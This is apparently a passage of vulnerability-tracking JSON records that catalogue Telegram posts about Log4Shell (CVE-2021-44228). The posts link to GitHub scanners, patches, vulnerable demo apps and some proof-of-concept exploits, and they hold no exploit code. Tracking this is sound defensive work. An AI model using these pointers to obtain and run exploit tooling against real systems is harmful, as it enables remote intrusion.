"https://t.me/GithubRedTeam/1022", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis repository contains a script that you can run on your (windows) machine to mitigate CVE-2021-44228\nURL\uff1ahttps://github.com/avwolferen/Sitecore.Solr-log4j-mitigation", "creation_timestamp": "2021-12-13T16:05:50.000000Z"}, {"uuid": "f09cf4ff-e218-4402-a914-14b84508ff5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1035", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aGitHub CodeQL Action to scan for CVE-2021\u201344228\nURL\uff1ahttps://github.com/benarculus/cve-2021-44228-code-scan", "creation_timestamp": "2021-12-13T22:02:32.000000Z"}, {"uuid": "1317010f-3652-462d-a286-a7b32ad6377f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1034", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 - Apache log4j RCE quick test\nURL\uff1ahttps://github.com/jeffli1024/log4j-rce-test", "creation_timestamp": "2021-12-13T21:58:23.000000Z"}, {"uuid": "009bef9d-a3ed-466f-879c-395c5be1cff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1044", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4j (CVE-2021-44228) Spring web application with vulnerabilities\nURL\uff1ahttps://github.com/Auddn/ITF-log4shell-Vulnapp", "creation_timestamp": "2021-12-14T04:10:53.000000Z"}, {"uuid": "0ae15f7d-8756-4b58-a6d0-cf0de2c9a581", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1043", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDemo project to evaluate Log4j2 Vulnerability | CVE-2021-44228\nURL\uff1ahttps://github.com/sandarenu/log4j2-issue-check", "creation_timestamp": "2021-12-14T02:29:17.000000Z"}, {"uuid": "2233b90b-9be6-4cf7-98b5-1c9b04b10e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1097", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aData we are receiving from our honeypots about CVE-2021-44228\nURL\uff1ahttps://github.com/honeynet/log4shell-data", "creation_timestamp": "2021-12-15T23:22:21.000000Z"}, {"uuid": "8851e49a-d442-4e69-9a1c-b0f7d48fa95b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1109", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\nURL\uff1ahttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner", "creation_timestamp": "2021-12-16T12:56:36.000000Z"}, {"uuid": "eb665d15-3bf1-4fae-a115-34bd9ae58f40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-09)", "content": "", "creation_timestamp": "2026-04-09T00:00:00.000000Z"}, {"uuid": "34c622f7-ddda-468f-a1d9-1e80149562a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8394", "content": "Interesting thread on RCE in Ghidra via log4j (CVE-2021-44228)\n\nhttps://twitter.com/zhuowei/status/1469511822411767811", "creation_timestamp": "2021-12-11T18:16:57.000000Z"}, {"uuid": "fb1c5413-76ff-40bd-b7da-3c28c89cdc29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8387", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Check Point response to Apache Log4j Remote Code Execution (CVE-2021-44228)\n\nhttps://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&amp;solutionid=sk176865", "creation_timestamp": "2021-12-11T10:56:07.000000Z"}, {"uuid": "c7b08b84-2615-4738-87bf-75b4b3934bfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8384", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability", "creation_timestamp": "2021-12-11T08:56:33.000000Z"}, {"uuid": "fe21d3f7-fddf-4fe7-975b-e581d2eeb562", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8381", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228)", "creation_timestamp": "2021-12-10T20:32:14.000000Z"}, {"uuid": "b3227491-662f-4b4e-89c1-4a22000ac53e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8397", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Keywords \ud83d\udd11 relevant for CVE-2021-44228.\n\nhttps://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", "creation_timestamp": "2021-12-11T18:25:59.000000Z"}, {"uuid": "dc988337-d596-41bf-a0a4-20a660797da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1026", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228, CVE-2018-3149\nURL\uff1ahttps://github.com/trevalkov/log4j2-banter", "creation_timestamp": "2021-12-13T18:28:40.000000Z"}, {"uuid": "3c2eb575-c760-435b-8fe7-cab484445f22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8395", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 Zero-Day in Ghidra due to CVE-2021-44228\n\nhttps://github.com/NationalSecurityAgency/ghidra/releases", "creation_timestamp": "2021-12-11T18:22:48.000000Z"}, {"uuid": "8b3aa1c2-41fd-4c20-9ced-742ba99f6ff4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/cKure/8400", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Zero-Day: VMWare vCenter is affected by the Log4j (CVE-2021-44228) vulnerability.\n\nhttps://t.co/pcJdRLEa3F", "creation_timestamp": "2021-12-11T18:37:13.000000Z"}, {"uuid": "45f6b89d-aa4a-443c-974d-474a5350703f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8398", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Archive: Applications should not perform JNDI lookups  \nwith untrusted data.\n\nCVE-2021-44228\n\nReference: Black Hat \ud83d\udc52 conference.", "creation_timestamp": "2021-12-11T20:05:52.000000Z"}, {"uuid": "9d8376e5-e6ac-4b6b-ab12-86f110bff5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8409", "content": "Python Log4RCE PoC | Log4Shell | CVE-2021-44228\n\nhttps://github.com/alexandre-lavoie/python-log4rce", "creation_timestamp": "2021-12-12T12:10:51.000000Z"}, {"uuid": "2028ec6e-4912-4e43-bd19-3f49d5a1a2bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8406", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 OWASP ZAP Zero-Day due to Log4Shell.\n\nA vulnerability has been found in Log4j which can result in Remote Code Execution (RCE):\u00a0CVE-2021-44228\u00a0also known as\u00a0Log4Shell.\nZAP 2.11.0 and the previous weekly and dev versions of ZAP use Log4j 2.14.1 which is known to be vulnerable.\n\nhttps://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/", "creation_timestamp": "2021-12-11T19:11:35.000000Z"}, {"uuid": "7c8b4195-6c18-4362-b72f-2d77d060e2fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8401", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Critical RCE 0day in Apache Log4j library exploited in the wild (CVE-2021-44228)\n\nhttps://www.helpnetsecurity.com/2021/12/10/cve-2021-44228/", "creation_timestamp": "2021-12-11T18:40:34.000000Z"}, {"uuid": "579fa5a9-4655-4b93-ad78-474cc7acb5a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1025", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell A test for CVE-2021-44228\nURL\uff1ahttps://github.com/yanghaoi/CVE-2021-44228_Log4Shell", "creation_timestamp": "2021-12-13T17:46:39.000000Z"}, {"uuid": "0e5d2183-2faf-416b-a76c-6a6e0ffcb233", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1055", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFind vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228)\nURL\uff1ahttps://github.com/fox-it/log4j-finder", "creation_timestamp": "2021-12-14T10:45:48.000000Z"}, {"uuid": "4aeb7beb-c0fb-4a1e-a0a8-a506d2753db5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1054", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA testing script that checks for vulnerable Log4j Log4Shell (CVE-2021-44228) systems using injection of the payload in common HTTP headers and as a part of a HTTP GET request.\nURL\uff1ahttps://github.com/NorthwaveSecurity/log4jcheck", "creation_timestamp": "2021-12-14T09:58:56.000000Z"}, {"uuid": "0de7d2a7-6c4d-4156-9943-5e760c25d9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1211", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aGeneric Scanner for Apache log4j RCE CVE-2021-44228\nURL\uff1ahttps://github.com/r00thunter/Log4Shell", "creation_timestamp": "2021-12-22T09:18:59.000000Z"}, {"uuid": "3b484e79-6ba3-4011-aa76-ecf62fa05a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1322", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability\nURL\uff1ahttps://github.com/jrocia/Search-log4Jvuln-AppScanSTD", "creation_timestamp": "2022-01-14T16:49:17.000000Z"}, {"uuid": "6d45708f-b3c8-4fcc-a9cc-df78ba7cb7d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1033", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA micro lab for CVE-2021-44228 (log4j)\nURL\uff1ahttps://github.com/tasooshi/horrors-log4shell", "creation_timestamp": "2021-12-13T21:33:08.000000Z"}, {"uuid": "7834e519-fa58-482b-9448-40a494e41cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1032", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aNmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)\nURL\uff1ahttps://github.com/giterlizzi/nmap-log4shell", "creation_timestamp": "2021-12-13T20:55:18.000000Z"}, {"uuid": "7440beac-76f2-41d9-b231-fa9590b57208", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1031", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDemonstration of CVE-2021-44228 with a possible strategic fix.\nURL\uff1ahttps://github.com/strawhatasif/log4j-test", "creation_timestamp": "2021-12-13T19:48:11.000000Z"}, {"uuid": "9d0cc389-2363-4ed4-ad63-83a7f9747471", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1030", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPython3 script for scanning CVE-2021-44228 (Log4shell) vulnerable machines.\nURL\uff1ahttps://github.com/lfama/log4j_checker", "creation_timestamp": "2021-12-13T19:39:56.000000Z"}, {"uuid": "8330f02d-85fd-4628-a424-b157f446b14e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1029", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCompiling links of value i find regarding CVE-2021-44228\nURL\uff1ahttps://github.com/ben-smash/l4j-info", "creation_timestamp": "2021-12-13T19:19:06.000000Z"}, {"uuid": "894990ce-2387-4dc3-9d0c-3fe96411468a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1028", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPublic IOCs about log4j CVE-2021-44228\nURL\uff1ahttps://github.com/threatmonit/Log4j-IOCs", "creation_timestamp": "2021-12-13T18:53:57.000000Z"}, {"uuid": "f25a2286-3703-468c-9c8a-81d50de04c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1038", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aFind log4j for CVE-2021-44228 on some places * Log4Shell\nURL\uff1ahttps://github.com/perryflynn/find-log4j", "creation_timestamp": "2021-12-13T22:31:58.000000Z"}, {"uuid": "d464e2d6-7b3b-44bb-aea4-704dbed5a297", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8405", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Blue-Team cheat-sheet for Log4Shell | CVE-2021-44228 prevention.\n\nA list of bulletins: \n\nhttps://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592", "creation_timestamp": "2021-12-11T19:11:53.000000Z"}, {"uuid": "c34ee207-86d6-466d-b0a8-84c7dd0f531b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8417", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Python Log4RCE: An all-in-one pure Python3 PoC for\u00a0CVE-2021-44228.\n\nhttps://github.com/alexandre-lavoie/python-log4rce", "creation_timestamp": "2021-12-13T18:39:35.000000Z"}, {"uuid": "42ec2064-017a-4a72-938b-b90fa00d811e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/cKure/8440", "content": "CVE-2021-44228 aka Log4shell summarized.\n\nhttps://m.youtube.com/watch?v=w2F67LbEtnk", "creation_timestamp": "2021-12-17T16:53:34.000000Z"}, {"uuid": "0c3a3a1e-5f82-44da-8490-f8a08e5d9403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1103", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1alog4shell (CVE-2021-44228) scanning tool\nURL\uff1ahttps://github.com/shamo0/CVE-2021-44228", "creation_timestamp": "2021-12-16T09:29:13.000000Z"}, {"uuid": "bdbab870-4b17-4d7e-8a74-8bc30ea5c195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1108", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple webapp that is vulnerable to Log4Shell (CVE-2021-44228)\nURL\uff1ahttps://github.com/korteke/log4shell-demo", "creation_timestamp": "2021-12-16T12:52:18.000000Z"}, {"uuid": "42804aae-9859-4683-b2e7-bbf43a65c687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1106", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPatch up CVE-2021-44228 for minecraft forge 1.7.10 - 1.12.2\nURL\uff1ahttps://github.com/Glease/Healer", "creation_timestamp": "2021-12-16T12:00:11.000000Z"}, {"uuid": "955df031-852a-4664-bbe0-dde4629c6bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1105", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines.\nURL\uff1ahttps://github.com/Joefreedy/Log4j-Windows-Scanner", "creation_timestamp": "2021-12-16T10:42:41.000000Z"}, {"uuid": "14da454f-4d41-4cb2-a52c-5ee23957a241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1141", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-44228\nURL\uff1ahttps://github.com/ermohitrathore/detect-log4j-exploitable", "creation_timestamp": "2021-12-17T18:06:53.000000Z"}, {"uuid": "2ad80557-e53e-466c-ac05-7c65396210c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1139", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\nURL\uff1ahttps://github.com/Aschen/log4j-patched", "creation_timestamp": "2021-12-17T16:39:58.000000Z"}, {"uuid": "f65b499d-0ee4-4212-9a7f-ca2b694b8ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1138", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLog4Shell (CVE-2021-44228) description, exploitation and remediation\nURL\uff1ahttps://github.com/zane00/CVE-2021-44228", "creation_timestamp": "2021-12-17T16:26:45.000000Z"}, {"uuid": "a734ade7-d964-4355-91c9-dfc4d472cd04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1137", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThe script \\\"Py3-detect-log4j-12.2021.py\\\" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228.\nURL\uff1ahttps://github.com/nx6110a5100/Py3-detect-log4j-12.2021", "creation_timestamp": "2021-12-17T13:11:01.000000Z"}, {"uuid": "879304ce-193e-47eb-8a85-923dda03aea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1136", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aJava application vulnerable to the CVE-2021-44228 (a.k.a log4shell) vulnerability\nURL\uff1ahttps://github.com/GroupePSA/log4shell-honeypot", "creation_timestamp": "2021-12-17T10:37:54.000000Z"}, {"uuid": "816706fe-e34c-452d-be43-c0f47a522519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "146797f7-2b37-4583-86ec-c8171e59d673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1145", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\nURL\uff1ahttps://github.com/lukepasek/log4jjndilookupremove", "creation_timestamp": "2021-12-17T20:43:16.000000Z"}, {"uuid": "751831a1-866a-4e9c-8fee-5f55eadef158", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/1144", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1a Simple Spring Boot application vulnerable to CVE-2021-44228 (a.k.a log4shell) \nURL\uff1ahttps://github.com/guerzon/log4shell", "creation_timestamp": "2021-12-17T20:34:29.000000Z"}, {"uuid": "21f1bc5d-7b21-4ac0-9e71-a045d7805060", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": 